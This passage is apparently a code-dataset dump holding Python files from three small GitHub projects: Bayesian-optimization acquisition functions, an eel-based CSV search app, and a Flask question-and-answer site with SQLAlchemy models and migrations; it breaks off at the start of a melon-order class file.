inputs, as well as the maximum knowledge gradient value. 
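The first six entries are the maximum of the fused\n model, the cost-scaled knowledge gradient, the index of the selected test\n point, and the jj, kk and mm indices. 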
Included\n        in the output are the values for all the inputs that correspond to both \n        the maximum knowledge gradient and the maximum of the fused model\n\n    \"\"\"\n    with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n        data = load(f)\n    with open(\"data/reificationObj\", 'rb') as f:\n        model_temp = load(f)\n    (finish, model_data, x_fused, fused_model_HP, \\\n     kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n    # Initialize the output \n    output = [0,0,0,jj,kk,mm]\n    # Create the fused model\n    model_temp.update_GP(*model_data)\n    model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n                               fused_model_HP[0], 0.1, \n                               kernel)\n    # Use the fused model to obtain the mean and variance at all test points\n    fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n    # Find the index of the test point that has the maximum of the fused model\n    index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n    # if there is more than one maximum, use the first index\n    try:\n        index_max = index_max_[0]\n    except IndexError:\n        index_max = index_max_\n    # Add the maximum of the fused model to the output \n    output[0] = np.max(fused_mean)\n    # Calculate the knowledge gradient for all test points\n    nu_star, x_star, NU = knowledge_gradient(true_sample_count, \n                                             0.1, \n                                             fused_mean, \n                                             fused_var)\n    # Add the maximum knowledge gradient and the index of the test point to the\n    # output list\n    output[1] = nu_star/cost[jj]\n    output[2] = x_star\n    # Add the actual input values for the maximum of the fused model\n    if len(x_test.shape) > 1:\n        for ii in range(x_test.shape[1]):\n            output.append(x_test[index_max,ii])\n    else:\n        output.append(x_test[index_max])\n    # Add the input values for the maximum knowledge gradient value\n    for i in range(x_test.shape[1]):\n        output.append(x_test[x_star,i])\n    # Return the results\n    return output\n\ndef calculate_EI(param):\n    \"\"\"\n    Parameters\n    ----------\n    param : tuple\n        The input is a tuple that contains the data required for calculating the\n        expected improvement of a fused model constructed out of a reification \n        model object.\n\n    Returns\n    -------\n    results : list\n        The output from the module contains information on some of the parameters\n        used as inputs, as well as the maximum expected improvement value. 
Included\n        in the output are the values for all the inputs that correspond to both \n        the maximum expected improvement and the maximum of the fused model\n\n    \"\"\"\n    with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n        data = load(f)\n    with open(\"data/reificationObj\", 'rb') as f:\n        model_temp = load(f)\n    (finish, model_data, x_fused, fused_model_HP, \\\n     kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n    # Initialize the output \n    output = [0,0,0,jj,kk,mm]\n    # Create the fused model\n    model_temp.update_GP(*model_data)\n    model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n                               fused_model_HP[0], 0.1, \n                               kernel)\n    # Use the fused model to obtain the mean and variance at all test points\n    fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n    fused_var = np.diag(fused_var)\n    # Find the index of the test point that has the maximum of the fused model\n    index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n    # if there is more than one maximum, use the first index\n    try:\n        index_max = index_max_[0]\n    except IndexError:\n        index_max = index_max_\n    # Add the maximum of the fused model to the output \n    output[0] = np.max(fused_mean)\n    # Calculate the expected improvement for all test points\n    nu_star, x_star, NU = expected_improvement(curr_max, \n                                               0.01, \n                                               fused_mean, \n                                               fused_var)\n    # Add the maximum expected improvement and the index of the test point to the\n    # output list\n    output[1] = nu_star/cost[jj]\n    output[2] = x_star\n    # Add the actual input values for the maximum of the fused model\n    if len(x_test.shape) > 1:\n        for ii in range(x_test.shape[1]):\n            output.append(x_test[index_max,ii])\n    else:\n        output.append(x_test[index_max])\n    # Add the input values for the maximum expected improvement value\n    for i in range(x_test.shape[1]):\n        output.append(x_test[x_star,i])\n    # Return the results\n    return output  \n\n\n\ndef calculate_TS(param):\n    \"\"\"\n    Parameters\n    ----------\n    param : tuple\n        The input is a tuple that contains the data required for calculating the\n        Thompson Sampling of a fused model constructed out of a reification \n        model object.\n\n    Returns\n    -------\n    results : list\n        The output from the module contains information on some of the parameters\n        used as inputs, as well as the maximum Thompson sampling value. 
Included\n        in the output are the values for all the inputs that correspond to both \n        the maximum Thompson sample and the maximum of the fused model\n\n    \"\"\"\n    with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n        data = load(f)\n    with open(\"data/reificationObj\", 'rb') as f:\n        model_temp = load(f)\n    (finish, model_data, x_fused, fused_model_HP, \\\n     kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n    # Initialize the output \n    output = [0,0,0,jj,kk,mm]\n    # Create the fused model\n    model_temp.update_GP(*model_data)\n    model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n                               fused_model_HP[0], 0.1, \n                               kernel)\n    # Use the fused model to obtain the mean and variance at all test points\n    fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n    fused_var = np.diag(fused_var)\n    # Find the index of the test point that has the maximum of the fused model\n    index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n    # if there is more than one maximum, use the first index\n    try:\n        index_max = index_max_[0]\n    except IndexError:\n        index_max = index_max_\n    # Add the maximum of the fused model to the output \n    output[0] = np.max(fused_mean)\n    # Calculate the Thompson sample for all test points\n    nu_star, x_star, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n    # Add the maximum Thompson sampling value and the index of the test point to the\n    # output list\n    output[1] = nu_star/cost[jj]\n    output[2] = x_star\n    # Add the actual input values for the maximum of the fused model\n    if len(x_test.shape) > 1:\n        for ii in range(x_test.shape[1]):\n            output.append(x_test[index_max,ii])\n    else:\n        output.append(x_test[index_max])\n    # Add the input values for the maximum Thompson sampling value\n    for i in range(x_test.shape[1]):\n        output.append(x_test[x_star,i])\n    # Return the results\n    return output  \n\ndef fused_calculate(param):\n    \"\"\"\n    Parameters\n    ----------\n    param : tuple\n        The input is a tuple that contains the data required for calculating the\n        maximum of a fused model generated from a reification object.\n\n    Returns\n    -------\n    results : list\n        The output from the module contains the maximum of the fused model as \n        well as the index of the test point that corresponds with that value.\n\n    \"\"\"\n    with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n        data = load(f)\n    with open(\"data/reificationObj\", 'rb') as f:\n        model_temp = load(f)\n    (finish, model_data, x_fused, fused_model_HP, \\\n     kernel, x_test, curr_max, xi, sampleOpt) = data[param[0]]\n    # Create the fused model\n    model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n                               fused_model_HP[0], 0.1, \n                               kernel)\n    fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n    if sampleOpt == \"TS\":\n        \"\"\"\n        Thompson sampling approach\n        This approach uses the uncertainty, but is quite significantly slower\n        \"\"\"\n        fused_var = np.diag(fused_var)\n        nu_star, x_star, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n        output = [nu_star, x_star]\n    elif sampleOpt == \"EI\":\n        \"\"\"\n        Expected Improvement approach\n        \"\"\"\n        fused_var = np.diag(fused_var)\n        nu_star, x_star, NU = expected_improvement(curr_max, \n                                                   xi, \n                                                   fused_mean, \n                                                   fused_var)\n        output = [nu_star, x_star]\n    elif sampleOpt == \"KG\":\n        \"\"\"\n        Knowledge Gradient approach\n        \"\"\"\n        nu_star, x_star, NU = knowledge_gradient(x_test.shape[0], \n                                                 0.1, \n                                                 fused_mean, \n                                                 fused_var)\n        output = [nu_star, x_star]\n    elif sampleOpt == \"Hedge\":\n        output = []\n        nu, x, NU = 
knowledge_gradient(x_test.shape[0], \n                           0.1, \n                           fused_mean, \n                           fused_var)\n        output.append([nu, x])\n        fused_var = np.diag(fused_var)\n        nu, x, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n        output.append([nu, x])\n        nu, x, NU = expected_improvement(curr_max, \n                                         xi, \n                                         fused_mean, \n                                         fused_var)\n        output.append([nu, x])\n        nu = np.max(fused_mean)\n        try:\n            x = int(np.nonzero(fused_mean == nu)[0])\n        except TypeError:\n            x = int(np.nonzero(fused_mean == nu)[0][0])\n        output.append([nu, x])\n    else:\n        \"\"\"\n        Greedy Sampling Approach\n        \"\"\"\n        # Find the maximum of the fused model\n        nu_star = np.max(fused_mean)\n        try:\n            x_star = int(np.nonzero(fused_mean == nu_star)[0])\n        except TypeError:\n            x_star = int(np.nonzero(fused_mean == nu_star)[0][0])\n        output = [nu_star, x_star]\n    \n    # return the maximum value and the index of the test point that corresponds\n    # with the maximum value\n    return output, x_test.shape[0]\n\ndef calculate_GPHedge(param):\n    \"\"\"\n    Parameters\n    ----------\n    param : tuple\n        The input is a tuple that contains the data required for calculating the\n        values from all acquisition functions for use in the GP Hedge portfolio\n        optimization approach.\n\n    Returns\n    -------\n    results : list\n        The output from the module contains the maximum of all acquisition functions\n        and the x values associated with these points.\n\n    \"\"\"\n    with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n        data = load(f)\n    with open(\"data/reificationObj\", 'rb') as f:\n        model_temp = load(f)\n    (finish, model_data, x_fused, fused_model_HP, \\\n     kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n    # Initialize the output \n    output = [[0,[],[],jj,kk,mm],\n              [0,[],[],jj,kk,mm],\n              [0,[],[],jj,kk,mm],\n              [0,[],[],jj,kk,mm]]\n    # Create the fused model\n    model_temp.update_GP(*model_data)\n    model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n                               fused_model_HP[0], 0.1, \n                               kernel)\n    # Use the fused model to obtain the mean and variance at all test points\n    fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n    \n    # Find the index of the test point that has the maximum of the fused model\n    index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n    # if there is more than one maximum, use the first index\n    try:\n        index_max = index_max_[0]\n    except IndexError:\n        index_max = index_max_\n    # Add the maximum of the fused model to the output \n    output[0][0] = np.max(fused_mean)\n    output[1][0] = np.max(fused_mean)\n    output[2][0] = np.max(fused_mean)\n    output[3][0] = np.max(fused_mean)\n\n    nu_star = []\n    x_star = []\n    \n    \n    #################\n    ################\n    # Need to convert this next section to run in parallel to reduce the time\n    \n    \"\"\"\n    Knowledge Gradient approach\n    \"\"\"\n    nu_star, x_star, NU = knowledge_gradient(x_test.shape[0], \n                                             0.1, \n                                             fused_mean, \n                                             fused_var)\n    output[0][1] = nu_star/cost[jj]\n    output[0][2] = x_star\n\n    \"\"\"\n    Thompson sampling approach\n    This approach uses the uncertainty, but is quite significantly slower\n    \"\"\"\n    fused_var = np.diag(fused_var)\n    nu_star, x_star, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n    output[1][1] = nu_star/cost[jj]\n    output[1][2] = x_star\n    \n    \"\"\"\n    Expected Improvement approach\n    \"\"\"\n    nu_star, x_star, NU = expected_improvement(curr_max, \n                                               0.01, \n                                               fused_mean, \n                                               fused_var)\n    output[2][1] = nu_star/cost[jj]\n    output[2][2] = x_star\n    \n    \"\"\"\n    Greedy Sampling Approach\n    \"\"\"\n    # Find the maximum of the fused model\n    nu_star = np.max(fused_mean)\n    try:\n        x_star = 
int(np.nonzero(fused_mean == nu_star)[0])\n    except TypeError:\n        x_star = int(np.nonzero(fused_mean == nu_star)[0][0])\n    output[3][1] = nu_star/cost[jj]\n    output[3][2] = x_star\n    \n    \n    \n    # Add the actual input values for the maximum of the fused model\n    if len(x_test.shape) > 1:\n        for ii in range(x_test.shape[1]):\n            output[0].append(x_test[index_max,ii])\n            output[1].append(x_test[index_max,ii])\n            output[2].append(x_test[index_max,ii])\n            output[3].append(x_test[index_max,ii])\n    else:\n        output[0].append(x_test[index_max])\n        output[1].append(x_test[index_max])\n        output[2].append(x_test[index_max])\n        output[3].append(x_test[index_max])\n    \n    for i in range(x_test.shape[1]):\n        output[0].append(x_test[output[0][2],i])\n        output[1].append(x_test[output[1][2],i])\n        output[2].append(x_test[output[2][2],i])\n        output[3].append(x_test[output[3][2],i])\n    \n    return output\n\ndef calculate_Greedy(param):\n    \"\"\"\n    Parameters\n    ----------\n    param : tuple\n        The input is a tuple that contains the data required for calculating the\n        Maximum of a fused model constructed out of a reification \n        model object for Greedy optimization\n\n    Returns\n    -------\n    results : list\n        The output from the module contains information on some of the parameters\n        used as inputs, as well as the maximum of the fused model. Included\n        in the output are the values for all the inputs that correspond to the maximum of the fused model\n\n    \"\"\"\n    with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n        data = load(f)\n    with open(\"data/reificationObj\", 'rb') as f:\n        model_temp = load(f)\n    (finish, model_data, x_fused, fused_model_HP, \\\n     kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n    # Initialize the output \n    output = [0,0,0,jj,kk,mm]\n    # Create the fused model\n    model_temp.update_GP(*model_data)\n    model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n                               fused_model_HP[0], 0.1, \n                               kernel)\n    # Use the fused model to obtain the mean and variance at all test points\n    fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n    fused_var = np.diag(fused_var)\n    # Find the index of the test point that has the maximum of the fused model\n    index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n    # if there is more than one maximum, use the first index\n    if index_max_[0].shape[0] > 1:\n        index_max = int(index_max_[0][0])\n    else:\n        index_max = int(index_max_[0])\n    # try:\n    #     index_max = int(index_max_)\n    # except TypeError:\n    #     try:\n    #         index_max = int(index_max_[0])\n    #     except TypeError:\n    #         index_max = int(index_max_[0][0])\n    # Add the maximum of the fused model to the output \n    output[0] = np.max(fused_mean)\n    # Add the maximum of the fused model and the index of the test point to the\n    # output list\n    output[1] = np.max(fused_mean)\n    output[2] = index_max\n    # Add the actual input values for the maximum of the fused model\n    for kk in range(2):\n        if len(x_test.shape) > 1:\n            for ii in range(x_test.shape[1]):\n                output.append(x_test[index_max,ii])\n        else:\n            output.append(x_test[index_max])\n    # Return the results\n    # print(output)\n    return output  \n\n\ndef evaluateFusedModel(param):\n    # in order to update the gains for the GP Hedge Portfolio optimization scheme\n    # it is necessary to query the next best points predicted by all the acquisition\n    # functions.\n    with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n        data = load(f)\n    with open(\"data/reificationObj\", 'rb') as f:\n        model_temp = load(f)\n    (finish, model_data, x_fused, fused_model_HP, \\\n    
kernel, x_test, curr_max, xi, acqIndex) = data[param[0]]\n # Create the fused model\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n return [acqIndex, fused_mean]\n" } ]
8
hub-vixiv/task3_2
https://github.com/hub-vixiv/task3_2
706b5f78fda97413cbf2d14d5e4ba1d31c9a897a
6c7ca2b94e8d0805c5af605696110621198c8277
dd5d7bf736c434b8a109e266e1454bab01d76eac
refs/heads/master
2023-06-19T21:02:42.784222
2021-07-17T10:43:31
2021-07-17T10:43:31
386,903,522
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5032467246055603, "alphanum_fraction": 0.5043290257453918, "avg_line_length": 28.838708877563477, "blob_id": "be7917974af4a67429558d27abbd8db0ffdb6d47", "content_id": "513df6375652cf2b8d3cf61283aeaeac08868436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1140, "license_type": "no_license", "max_line_length": 77, "num_lines": 31, "path": "/search.py", "repo_name": "hub-vixiv/task3_2", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport eel\n\n\ndef kimetsu_search(filename, word):\n # 検索対象取得\n df=pd.read_csv(\"./\" + filename)\n source = list(df[\"name\"])\n\n # 検索\n if word in source:\n print(\"yes\")\n eel.show_result(f\"『{word}』はあります\")\n else:\n print(\"no\")\n eel.show_result(f\"『{word}』はありません\")\n # 追加\n # リストに保存するか確認ダイアログ表示\n add_yesno = eel.ask_add_list()()\n if add_yesno == True: #リストに保存する\n source.append(word)\n print(source)\n # ファイルに保存するか確認ダイアログ表示\n save_yesno = eel.ask_save()()\n if save_yesno == True: #ファイルに保存する\n #保存するパスを要求ダイアログ表示\n save_path = eel.ask_save_path()()\n if save_path != None: #パスが空でなければ\n # CSV書き込み\n df=pd.DataFrame(source,columns=[\"name\"])\n df.to_csv(f\"{save_path}/source.csv\",encoding=\"utf_8-sig\")" }, { "alpha_fraction": 0.7472222447395325, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 19.05555534362793, "blob_id": "7908ed84d28c9b3731045434e26fb6dad78788ad", "content_id": "cd12f3339bd9c356afa91248ead158b7db262069", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/view.py", "repo_name": "hub-vixiv/task3_2", "src_encoding": "UTF-8", "text": "import eel\nfrom pandas.core import series\nimport desktop\nimport search\nimport pandas as pd\n\napp_name=\"html\"\nend_point=\"index.html\" #確認なし\nsize=(700,600)\n\n\n# 検索処理呼び出し\n@ eel.expose\ndef kimetsu_search(filename, word):\n search.kimetsu_search(filename, word)\n\ndesktop.start(app_name,end_point,size)\n#desktop.start(size=size,appName=app_name,endPoint=end_point)" } ]
2
Banjiushi/flask-project
https://github.com/Banjiushi/flask-project
2ed49a0f7330d655aa1d9c9cf01967de5a92876c
029cd6b42ad7d8322c764ac3237a47d0709b9074
9ceb274079e18a90f8a6c7c3eb4192ce817b611c
refs/heads/master
2021-07-09T07:55:20.667550
2017-10-09T01:02:11
2017-10-09T01:02:11
105,438,646
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 30.46666717529297, "blob_id": "4d25dff113e1cc53592ced2d816c3b04a9f54d48", "content_id": "04a5a12a8ac7079960c8129a821818011c3d12e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 890, "license_type": "no_license", "max_line_length": 189, "num_lines": 15, "path": "/README.md", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# flask-project\n\n### 使用flask和bootstrap搭建了一个简易问答平台\na) 技术范畴:flask,bootstrap \nb) 实现细节:一个基于flask及bootstrap的简单的仿知乎问答平台;支持登录,注册,发布问题,回答问题,查找答案等。 \nc) 项目特色:flask实现,灵活、易扩展;bootstrap搭建,简单易学。\n\n### 流程\n结构搭建 --> 导航条 --> 模板分离 --> 登录页面 --> 注册页面 --> User模型 --> 注册功能 --> 登录功能 --> 登录注销状态切换 --> 发布问答界面(视图函数) --> 登录限制(装饰器) --> 发布问答功能 --> 首页布局及功能 --> 问答详情 --> 评论(模型及功能) --> 评论列表展示 --> 查找功能 --> 密码存储优化\n\n执行数据库相关操作时报错: \n```\nModuleNotFoundError: No module named 'MySQLdb'\n```\n安装 mysqlclient 后解决\n" }, { "alpha_fraction": 0.677089273929596, "alphanum_fraction": 0.6827743053436279, "avg_line_length": 39, "blob_id": "8b6de610080af85d855e43a20b370f0485070bd0", "content_id": "708c5f62e547807e63eff3fd825473ff14342317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 93, "num_lines": 44, "path": "/models.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# 数据库模型文件\nfrom datetime import datetime\nfrom exts import db\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nclass User(db.Model):\n __tablename__ = 'user'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n phone = db.Column(db.String(11), nullable=False)\n username = db.Column(db.String(50), nullable=False)\n password = db.Column(db.String(100), nullable=False)\n\n def __init__(self, *args, **kw):\n self.phone = kw.get('phone')\n self.username = kw.get('username')\n self.password = generate_password_hash(kw.get('password'))\n\n def check_password(self, raw_passwd):\n rs = check_password_hash(self.password, raw_passwd)\n return rs\n \n\nclass Question(db.Model):\n __tablename__ = 'question'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n title = db.Column(db.String(100), nullable=False)\n content = db.Column(db.Text, nullable=False)\n create_time = db.Column(db.DateTime, default=datetime.now)\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n author = db.relationship('User', backref=db.backref('questions'))\n answer = db.relationship('Answer', backref=db.backref('answer.id'))\n\n\nclass Answer(db.Model):\n __tablename__ = 'answer'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n content = db.Column(db.Text, nullable=False)\n create_time = db.Column(db.DateTime, default=datetime.now)\n question_id = db.Column(db.Integer,db.ForeignKey('question.id'))\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n question = db.relationship('Question', backref=db.backref('answers', order_by=id.desc()))\n author = db.relationship('User', backref=db.backref('users'))" }, { "alpha_fraction": 0.6572890281677246, "alphanum_fraction": 0.6905370950698853, "avg_line_length": 20.77777862548828, "blob_id": "e9fd64b9f18ab9ceb99949b696b1592ba7815f89", "content_id": "f7b6b0f3b0161dc1a046ed67c0d69daead08b059", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, 
"license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/config.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# 配置文件\n\nimport os\n\nDEBUG = True\n\nSECRET_KEY = os.urandom(24)\n\nHOSTNAME = '127.0.0.1'\nPORT = '3306'\nDATABASE = 'zing_qa'\nUSERNAME = 'root'\nPASSWORD = 'password'\nDB_URI = 'mysql+mysqldb://{}:{}@{}:{}/{}?charset=utf8'.format(USERNAME,\n PASSWORD, HOSTNAME, PORT, DATABASE)\nSQLALCHEMY_DATABASE_URI = DB_URI\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nSQLALCHEMY_COMMIT_ON_TEARDOWN = True # 自动提交事务" }, { "alpha_fraction": 0.7611940503120422, "alphanum_fraction": 0.7611940503120422, "avg_line_length": 12.600000381469727, "blob_id": "041a2cfbf5778242d05ce0996d59c883acf42fb4", "content_id": "0c9bf6afb4c5410bf70670293fd04e7ee716d052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/exts.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# db 文件\n\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()" }, { "alpha_fraction": 0.6254323124885559, "alphanum_fraction": 0.6270284652709961, "avg_line_length": 27.484848022460938, "blob_id": "52d0cabedf5ab3801d6028057a881c28aca75875", "content_id": "395d57449575c9f516bf5a51166da4cdc3a863c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3953, "license_type": "no_license", "max_line_length": 125, "num_lines": 132, "path": "/zingqa.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# 应用文件\nfrom flask import Flask, request, redirect, render_template, url_for, \\\n session, g\nimport config\nfrom models import User, Question, Answer\nfrom exts import db\nfrom decorators import login_required\nfrom sqlalchemy import or_\n\napp = Flask(__name__)\napp.config.from_object(config)\ndb.init_app(app)\n\n\[email protected]('/')\ndef index():\n context = {\n 'questions': Question.query.order_by('-create_time').all()\n }\n return render_template('index.html', **context)\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n phone = request.form.get('phone')\n password = request.form.get('password')\n user = User.query.filter(User.phone == phone).first()\n if not (user and user.check_password(password)):\n return '手机号码或密码错误,请确认后再登录!'\n session['user_id'] = user.id\n # 如果想31天内免登陆\n session.permanent = True\n return redirect(url_for('index'))\n \n\[email protected]('/regist', methods=['GET', 'POST'])\ndef regist():\n if request.method == 'GET':\n return render_template('regist.html')\n else:\n phone = request.form.get('phone')\n username = request.form.get('username')\n password1 = request.form.get('password1')\n password2 = request.form.get('password2')\n\n ## 数据校验\n # 手机号码校验\n user = User.query.filter(User.phone == phone).first()\n if user:\n return '该手机号码已被注册,请更换手机号码!'\n # 密码校验\n if password1 != password2:\n return '两次输入的密码不相同,请核对后重新输入'\n # 校验成功,插入数据\n user = User(phone=phone,username=username,password=password1)\n db.session.add(user)\n db.session.commit()\n # 跳转到登录页面\n return redirect(url_for('login'))\n\n\[email protected]('/logout')\n@login_required\ndef logout():\n session.pop('user_id')\n return redirect(url_for('login'))\n\n\[email protected]('/question', methods=['GET', 'POST'])\n@login_required\ndef question():\n if request.method == 'GET':\n 
return render_template('question.html')\n    else:\n        title = request.form.get('title')\n        content = request.form.get('content')\n        question = Question(title=title,content=content)\n        question.author = g.user\n        db.session.add(question)\n        db.session.commit()\n        return redirect(url_for('index'))\n\n\[email protected]('/d/<question_id>')\n@login_required\ndef detail(question_id):\n    question = Question.query.filter(Question.id==question_id).first()\n    quest = Question.query.get(question_id)\n    num = len(quest.answer)\n    return render_template('detail.html', question=question, num=num)\n\n\[email protected]('/add_answer', methods=['POST'])\n@login_required\ndef add_answer():\n    content = request.form.get('answer')\n    question_id = request.form.get('question_id')\n    answer = Answer(content=content)\n    answer.author = g.user\n    question =Question.query.filter(Question.id==question_id).first()\n    answer.question = question\n    db.session.add(answer)\n    db.session.commit()\n    return redirect(url_for('detail', question_id=question_id))\n\n\[email protected]('/search')\ndef search():\n    q = request.args.get('q')\n    questions = Question.query.filter(or_(Question.title.contains(q), Question.content.contains(q))).order_by('-create_time')\n    return render_template('index.html', questions=questions)\n\[email protected]_request\ndef my_before_request():\n    user_id = session.get('user_id')\n    if user_id:\n        user = User.query.filter(User.id==user_id).first()\n        if user:\n            g.user = user\n\n\[email protected]_processor\ndef my_context_procesor():\n    if hasattr(g, 'user'):\n        return {'user': g.user}\n    return {}\n\n\nif __name__ == '__main__':\n    app.run(debug=True)" }, { "alpha_fraction": 0.7382199168205261, "alphanum_fraction": 0.7382199168205261, "avg_line_length": 18.149999618530273, "blob_id": "e29daf3a3a09901e990625b660868e950ffe8c06", "content_id": "a87fa891afefae3740cb728cba333b7a89e54644", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 49, "num_lines": 20, "path": "/manage.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# command-line file\n\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom zingqa import app\nfrom exts import db\n# the finished models also need to be imported here\nfrom models import User, Question, Answer\n\nmanager = Manager(app)\n\n# bind app and db with Migrate\nmigrate = Migrate(app, db)\n\n# register the migration script command with the manager\nmanager.add_command('db', MigrateCommand)\n\n\nif __name__ == '__main__':\n    manager.run()" }, { "alpha_fraction": 0.6319018602371216, "alphanum_fraction": 0.6702454090118408, "avg_line_length": 22.285715103149414, "blob_id": "253eadc5b2161384482d0d73541a5098d1ccde9a", "content_id": "8104ada5bbab5e5106f32552983981607ba82096", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 83, "num_lines": 28, "path": "/migrations/versions/a6dcc6d3cd24_.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "\"\"\"empty message\n\nRevision ID: a6dcc6d3cd24\nRevises: f65cfea73aae\nCreate Date: 2017-10-03 15:34:44.084412\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a6dcc6d3cd24'\ndown_revision = 'f65cfea73aae'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('answer', sa.Column('create_time', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('answer', 'create_time')\n # ### end Alembic commands ###\n" } ]
7
emilycheera/oo-melons
https://github.com/emilycheera/oo-melons
3a816d58d3f860ba5c57a898200fab7207b5d816
918d1ba1d1a945e0ad25620747767c0e5d9e4f99
70de6e564fc53d4743db1c45536cf75d4104edef
refs/heads/master
2020-12-14T04:15:52.823748
2020-01-17T23:57:49
2020-01-17T23:57:49
234,636,666
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.585489809513092, "alphanum_fraction": 0.6002772450447083, "avg_line_length": 22.279569625854492, "blob_id": "2f6da954a534cca9545ece90f7ee97dccd4709dd", "content_id": "019b462eb009c5c632f700ba82c0587ab39fc6bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2164, "license_type": "no_license", "max_line_length": 82, "num_lines": 93, "path": "/melons.py", "repo_name": "emilycheera/oo-melons", "src_encoding": "UTF-8", "text": "from random import randint\nfrom datetime import datetime\n\n\"\"\"Classes for melon orders.\"\"\"\nclass AbstractMelonOrder:\n \"\"\"An abstract base class that other Melon Orders inherit from.\"\"\"\n\n shipped = False\n\n def __init__(self, species, qty):\n self.species = species\n self.qty = qty\n \n if qty > 100:\n raise TooManyMelonsError(\"No more than 100 melons!\")\n\n def get_base_price(self):\n \"\"\"Return random base price from 5 to 9.\"\"\"\n\n day = datetime.now()\n\n base_price = randint(5, 9)\n\n if day.weekday() != 5 and day.weekday() != 6 and day.hour in range(8, 11):\n base_price += 4\n\n return base_price\n\n def get_total(self):\n \"\"\"Calculate price, including tax.\"\"\"\n base_price = self.get_base_price()\n print(base_price)\n\n if self.species == 'Christmas melon':\n base_price = base_price * 1.5\n\n total = (1 + self.tax) * self.qty * base_price\n\n return total\n\n def mark_shipped(self):\n \"\"\"Record the fact than an order has been shipped.\"\"\"\n\n self.shipped = True\n\n\n\nclass DomesticMelonOrder(AbstractMelonOrder):\n \"\"\"A melon order within the USA.\"\"\"\n\n order_type = 